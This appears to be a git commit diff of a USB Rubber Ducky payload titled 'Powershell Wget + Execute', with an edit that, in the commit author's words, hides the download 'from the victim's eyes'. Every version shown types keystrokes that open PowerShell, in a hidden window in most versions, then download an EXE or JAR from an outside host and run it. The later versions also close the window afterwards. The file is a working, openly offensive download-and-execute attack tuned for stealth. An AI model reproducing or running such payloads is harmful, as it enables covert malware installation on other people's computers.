The download process is now hidden from the victim's eyes as the code will run in a hidden powershell window. Also after the file finish exeacting the powershell window will be closed .
This commit is contained in:
parent
a29f3651eb
commit
00986e4168
|
@ -1,19 +0,0 @@
|
|||
Powershell Wget + Execute
|
||||
|
||||
Author: mubix
|
||||
Duckencoder: 1.2
|
||||
Target: Windows 7
|
||||
Description: Opens “RUN” box, throws power shell string, enter. Supports HTTP/S, and proxies.
|
||||
GUI r
|
||||
DELAY 100
|
||||
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
|
||||
ENTER
|
||||
|
||||
Adding two words to this makes it possible to hide the powershell window as it downloads and executes.
|
||||
|
||||
```
|
||||
GUI r
|
||||
DELAY 100
|
||||
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
|
||||
ENTER
|
||||
```
|
|
@ -0,0 +1,71 @@
|
|||
Powershell Wget + Execute
|
||||
|
||||
Author: mubix
|
||||
Duckencoder: 1.2
|
||||
Target: Windows 7
|
||||
Description: Opens “RUN” box, throws power shell string, enter. Supports HTTP/S, and proxies.
|
||||
GUI r
|
||||
DELAY 100
|
||||
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
|
||||
ENTER
|
||||
|
||||
Adding two words to this makes it possible to hide the powershell window as it downloads and executes.
|
||||
|
||||
```
|
||||
GUI r
|
||||
DELAY 100
|
||||
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
|
||||
ENTER
|
||||
```
|
||||
|
||||
|
||||
Edited by: Fahad Alkamli
|
||||
This is an improved version for the code above.
|
||||
In my opinion the user should see as minimum as possible so writing a whole line of code in the run is not discreet.
|
||||
|
||||
```
|
||||
REM You can remove this Delay line in the beginning (I just rather having it just in case)
|
||||
DELAY 60000
|
||||
REM open the Run
|
||||
GUI r
|
||||
REM Change this value depending on the computer you are using ( i mean slow or not )
|
||||
DELAY 100
|
||||
STRING powershell -windowstyle hidden
|
||||
ENTER
|
||||
REM the shell usually takes a few seconds to fully run so i put a delay just in case .
|
||||
DELAY 1000
|
||||
REM I just wanted to note that the file can be an EXE or JAR file doesn't really matter.
|
||||
REM in the destination if you put the fileName only, the file will be saved under C:\Users\LoggedInUser
|
||||
STRING $source = "File URL "; $destination = "Path\FileName"; Invoke-WebRequest $source -OutFile $destination;
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING start-process FileName.EXE
|
||||
ENTER
|
||||
DELAY 100
|
||||
STRING exit
|
||||
ENTER
|
||||
```
|
||||
Full Example with Jar:
|
||||
```
|
||||
REM You can remove this Delay line in the beginning (I just rather having it just in case)
|
||||
DELAY 60000
|
||||
REM open the Run
|
||||
GUI r
|
||||
REM Change this value depending on the computer you are using ( i mean slow or not )
|
||||
DELAY 100
|
||||
STRING powershell -windowstyle hidden
|
||||
ENTER
|
||||
REM the shell usually takes a few seconds to fully run so i put a delay just in case .
|
||||
DELAY 1000
|
||||
REM I just wanted to note that the file can be an EXE or JAR file doesn't really matter.
|
||||
REM in the destination if you put the fileName only, the file will be saved under C:\Users\LoggedInUser
|
||||
STRING $source = "http://192.168.43.34/Service.jar"; $destination = "Service.jar"; Invoke-WebRequest $source -OutFile $destination;
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING start-process Service.jar
|
||||
ENTER
|
||||
DELAY 100
|
||||
STRING exit
|
||||
ENTER
|
||||
```
|
||||
|
Loading…
Reference in New Issue